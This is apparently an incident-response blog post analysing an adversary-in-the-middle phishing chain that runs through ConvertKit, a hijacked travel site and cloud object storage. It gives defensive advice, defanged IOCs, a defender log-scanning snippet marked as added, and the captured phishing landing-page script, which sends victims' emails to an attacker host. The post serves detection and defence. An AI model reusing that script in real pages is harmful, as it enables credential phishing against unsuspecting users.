The Invisible Architecture of Modern Phishing

March 11, 2026

tl;dr

Adversary-in-the-Middle (AiTM) in 2026 is less about a single phishing site and more about a trust chain stitched together from legitimate platforms. Recently, we observed:

  • The email marketing platform ConvertKit is used to send the lure, inheriting legitimate sender trust.
  • A compromised long-standing small business site is used as the landing page to borrow reputation.
  • JavaScript hosted on Akamai or Linode Object Storage validates the victim and only then serves the login flow while diverting non-targets elsewhere.

What to do: Prioritize phishing-resistant MFA (e.g., FIDO2, Windows Hello for Business) and tighten Conditional Access (e.g., location/risk signals, app restrictions) to reduce token theft and session replay attacks.

Would your current logs distinguish a legitimate login from a proxied attack?

Introduction

Earlier this year, we were alerted by our partners at BIO-ISAC, who brought us into a situation via a third-party organization. What initially appeared to be a standard phishing attempt, the typical BEC-shaped noise you expect on a Friday afternoon, quickly revealed itself to be something more interesting. Once we started pulling the thread, it turned into an example of what AiTM looks like in 2026. 

You’re not fighting a single domain anymore. You’re fighting a trust chain that’s built to look normal, route around controls, and stay alive long after the first block.

Stealing Legitimacy 

It started with a legitimate sender. The email came through ConvertKit, a genuine email marketing platform, complete with the reputation and authentication signals that make secure email gateways pass it on. Even with AI everywhere these days, the phishing email failed on two counts: it used 'below' incorrectly as an adjective and included an accidental double space. The link included the target’s organization and upcoming event, and led to a ‘PDF’ to sign.

Figure 1 – Phishing lure sample.

The user clicks a ‘Review Document Here’ button and lands not on a fresh phishing domain, but on a real small business site that has been online since 2020: a local Greek travel agency. That’s the point. Domain-age-based defenses and automated URL scoring tend to relax when the infrastructure looks established. The threat actor didn’t build trust; they hijacked it.

Figure 2 – A fake PDF link leads to a real Greek travel website hosting a phishing page.

Relying on Cloud Scale

Then the invisible layer kicked in. The page loaded a background JavaScript hosted on mainstream cloud and CDN-adjacent infrastructure, specifically Akamai and Linode Object Storage. That script wasn’t a simple redirect; it validated the visitor.

If you were the intended target, it pulled the email from the URL and prefilled the login flow to make it feel seamless and legitimate. If you entered an email address other than the expected one, it quietly pushed you to the electronics store BestBuy.

Figure 3 – Phishing page and script to check credentials.
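A defender-side check for the hand-off described above, added here as an example and not part of the original write-up: it scans proxy log lines for requests to object-storage-hosted .html pages whose entire query string is one bare email address, the exact shape the landing-page script produces by appending the address unencoded after a '?'. The log format, user names, email addresses and the kit.com subdomain are assumptions; the storage hosts and the travel-site domain reuse the IOCs listed on this page.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed proxy log sample (not from the page): "timestamp user url referer".
# Hosts reuse the page's IOCs; users, e-mails and the kit.com subdomain are placeholders.
SAMPLE_LOG = """\
2026-03-06T14:02:11Z alice https://lure-placeholder.kit.com/8bb3e6198d -
2026-03-06T14:02:13Z alice https://gaiostravel.gr/victim-placeholder https://lure-placeholder.kit.com/8bb3e6198d
2026-03-06T14:02:19Z alice https://servsafepro00.us-mia-1.linodeobjects.com/indexi000.html?alice@acme.example https://gaiostravel.gr/victim-placeholder
2026-03-06T14:05:40Z bob https://rush-port0.us-southeast-1.linodeobjects.com/index6060.html?bob%40acme.example -
2026-03-06T14:07:02Z carol https://cdn.example.com/app.js?v=42 https://intranet.acme.example/
2026-03-06T14:09:55Z dave https://files.us-east-1.linodeobjects.com/report.html?id=123 -
"""

# Same e-mail pattern the landing-page script uses to gate submission.
EMAIL_RE = re.compile(r"^[^\s@]+@[^\s@]+\.[^\s@]{2,}$", re.I)

# Object-storage suffix seen hosting the gating page in this campaign; extend as needed.
STORAGE_SUFFIXES = (".linodeobjects.com",)


def bare_email_query(url):
    """Return the address if the URL's whole query string is a single e-mail
    (the DESTINATION + '?' + email shape), otherwise None."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if not host.endswith(STORAGE_SUFFIXES) or not parts.path.lower().endswith(".html"):
        return None
    # Decode in case a proxy or browser percent-encoded the '@'.
    query = unquote(parts.query)
    # A bare address has no key=value structure at all.
    if "=" in query or "&" in query:
        return None
    return query if EMAIL_RE.match(query) else None


def find_aitm_handoffs(log_text):
    """Return (user, host, email, referer) for each suspected hand-off line."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        _ts, user, url, referer = fields[:4]
        email = bare_email_query(url)
        if email:
            hits.append((user, urlsplit(url).hostname, email, referer))
    return hits
```

The referer on a hit is the compromised site that served the form, which is the domain to block and the one to tell the owner about.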

Taking Action

This is why AiTM is so prevalent. The face is a legitimate compromised website and the brains sit behind cloud object storage and CDN scale delivery. Blocking the host risks collateral damage. Blocking the domain is slow and temporary because the attacker can hop to the next compromised site in minutes. The chain is designed to outlast your patience and your playbook.

What actually changes the outcome is treating AiTM like a session theft problem:

  1. To prevent AiTM attacks, implement phishing-resistant MFA methods using hardware tokens or software passkeys (e.g., FIDO2, Windows Hello for Business).
  2. Implement strict Conditional Access policies. For example, geofencing logins from countries where your organization is not active (e.g., block logins from Nigeria).
  3. Assume persistence happens quietly, so audit inbox rules and recently deployed OAuth applications because that’s where attackers hide and how they come back.

Victimology

Based on infrastructure analysis, this campaign appears to be largely opportunistic, primarily targeting entities in Canada and the United States. Observed affected sectors include the following:

  • Construction
  • Agriculture
  • Airport & Aircraft Services
  • Industrial Material Suppliers

IOCs

Below is a list of IOCs, which can also be found on our GitHub.

  • hxxps://[LURE CONTENT].kit.com/8bb3e6198d – Phishing link.
  • gaiostravel[.]gr/[VICTIM NAME] – Compromised Greek travel site.
  • hxxps://chronicleplaque6.us-iad-10.linodeobjects[.]com/encon990.html – JavaScript hosted here.
  • hxxps://servsafepro00.us-mia-1.linodeobjects[.]com/indexi000.html – JavaScript hosted here.
  • hxxps://rush-port0.us-southeast-1.linodeobjects[.]com/index6060.html – JavaScript hosted here.
  • hxxps://filpro.us-lax-1.linodeobjects[.]com/indexer017.html – JavaScript hosted here.

Malicious Script

// Landing-page form handler: collects the visitor's e-mail and hands it to the
// object-storage-hosted page as a bare, unencoded query string. The opening
// IIFE wrapper was lost in extraction and is restored here; the body is unchanged.
(() => {
  /* ===== CONFIG ===== */
  const DESTINATION = 'hxxps://servsafepro00.us-mia-1.linodeobjects[.]com/indexi000.html';
  const PREFIX = '?';
  const REDIRECT_DELAY = 1200;

  /* ===== ELEMENTS ===== */
  const form = document.getElementById('verifyForm');
  const emailInput = document.getElementById('email');
  const button = document.getElementById('continueBtn');
  const loading = document.getElementById('loading');
  if (!form || !emailInput || !button || !loading) return;

  let isSubmitting = false;

  /* ===== HELPERS ===== */
  const isValidEmail = (value) => {
    return /^[^\s@]+@[^\s@]+\.[^\s@]{2,}$/i.test(value);
  };

  const updateButtonState = () => {
    const value = emailInput.value.trim();
    button.disabled = !value || !isValidEmail(value);
  };

  const lockUI = () => {
    isSubmitting = true;
    button.disabled = true;
    button.style.display = 'none';
    loading.style.display = 'block';
  };

  const redirectUser = (email) => {
    // intentionally NOT encoded (matches original behavior)
    window.location.replace(DESTINATION + PREFIX + email);
  };

  /* ===== EVENTS ===== */
  emailInput.addEventListener('input', updateButtonState);
  emailInput.addEventListener('blur', updateButtonState);

  form.addEventListener('submit', (e) => {
    e.preventDefault();
    if (isSubmitting) return;
    const email = emailInput.value.trim();
    if (!isValidEmail(email)) return;
    lockUI();
    setTimeout(() => redirectUser(email), REDIRECT_DELAY);
  });

  /* ===== INIT ===== */
  updateButtonState();
})();

About Invictus Incident Response

We are an incident response company that ❤️ the cloud, and we specialize in helping organizations prepare for and respond to cyber attacks. We help our clients stay undefeated!

🆘 For incident response support, reach out to cert@invictus-ir.com or go to https://www.invictus-ir.com/24-7